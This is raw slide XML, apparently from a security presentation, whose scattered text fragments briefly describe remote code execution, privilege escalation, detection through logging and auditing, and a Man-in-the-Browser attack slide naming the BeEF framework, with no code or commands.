                  <a:pt x="5094" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192786" y="1156716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525" y="1156716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525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303523" y="4399534"/>
            <a:ext cx="991489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5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ppor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7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mo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ex</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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cutio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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dirty="0" sz="2200" spc="-15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2200" spc="-1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cod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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ansfer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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr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15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an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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machi</a:t>
            </a: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015995" y="5393435"/>
            <a:ext cx="10497820" cy="1156970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10497819" h="1156970">
                <a:moveTo>
                  <a:pt x="10304525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192786" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192786" y="1156715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525" y="1156715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525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888484" y="5778246"/>
            <a:ext cx="675132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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Supports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vertical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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>horizontal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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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escalation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15995" y="6771131"/>
            <a:ext cx="10497820" cy="1156970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10497819" h="1156970">
                <a:moveTo>
                  <a:pt x="10304525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192786" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192786" y="1156716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525" y="1156716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525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577844" y="7156831"/>
            <a:ext cx="936752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Detects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process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logging,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>auditing,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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automated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detection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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>scanning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14491" y="306451"/>
            <a:ext cx="482727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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-10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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attack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26508" y="760476"/>
            <a:ext cx="6588252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916991" y="1933575"/>
            <a:ext cx="8373745" cy="6348730"/>
            <a:chOff x="6916991" y="1933575"/>
            <a:chExt cx="8373745" cy="634873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26580" y="1943100"/>
              <a:ext cx="8354568" cy="632917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921754" y="1938337"/>
              <a:ext cx="8364220" cy="6339205"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8364219" h="6339205">
                  <a:moveTo>
                    <a:pt x="0" y="6338697"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8364093" y="6338697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8364093" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6338697"/>
                  </a:lnTo>
                  <a:close/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9172447" y="8569858"/>
            <a:ext cx="448310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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="14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30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14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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="14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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="14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1400">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(BeEF)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicod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647634" y="2536126"/>
            <a:ext cx="4549140" cy="1761489"/>
            <a:chOff x="1647634" y="2536126"/>
            <a:chExt cx="4549140" cy="1761489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1661922" y="2550414"/>
              <a:ext cx="4520565" cy="1732914"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4520565" h="1732914">
                  <a:moveTo>
                    <a:pt x="4365498" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154685" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1578101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="1732787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="1732787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="1578101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="154685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498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61922" y="2550414"/>
              <a:ext cx="4520565" cy="1732914"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4520565" h="1732914">
                  <a:moveTo>
                    <a:pt x="0" y="154685"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7882" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="154685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="1578101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="1732787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="1732787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1578101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154685"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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794764" y="1933193"/>
            <a:ext cx="4757420" cy="20491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Some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key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points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related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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>MitB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are: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250">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="52705" marR="1287780">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>MitB</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-135">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-125">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>carrie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-135">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>out</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-125">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>by  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-150">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-150">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-45">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>mal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>io</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-125">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ri</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-50">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-60">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-120">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>or  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>plugins.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647634" y="4503610"/>
            <a:ext cx="4549140" cy="1761489"/>
            <a:chOff x="1647634" y="4503610"/>
            <a:chExt cx="4549140" cy="1761489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1661922" y="4517897"/>
              <a:ext cx="4520565" cy="1732914"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4520565" h="1732914">
                  <a:moveTo>
                    <a:pt x="4365498" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154685" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1578102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
